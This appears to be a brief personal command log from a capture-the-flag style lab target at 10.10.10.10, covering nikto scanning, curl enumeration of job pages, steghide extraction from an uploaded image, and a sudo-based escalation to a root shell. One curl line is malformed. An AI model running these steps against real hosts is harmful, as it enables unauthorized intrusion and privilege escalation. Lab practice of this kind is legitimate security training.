nikto -h 10.10.10.10

http://10.10.10.10/index.php/jobs/

 for i in $(seq 1 20); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<title'; done



for i in {1 20}; do  curl -s -k 'GET' -H 'header info' -' 'http://10.10.10.10/index.php/jobs/id='$i done

strings
binwalk
steghide extract -sf xxx.jpg

 http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg

steghide extract -sf HackerAccessGranted.jpg 

http://www.xsisec.com/screenshots/Kali%20Linux%2064%20bit%20amd%20-%20VMware%20Workstation_002.png


sudo --list (-l)
file /bin/fuckin
sudo /bin/fuckin bash

